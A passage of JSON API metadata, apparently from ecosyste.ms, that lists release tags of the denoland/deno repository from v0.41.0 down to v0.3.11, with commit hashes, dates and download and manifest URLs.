/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/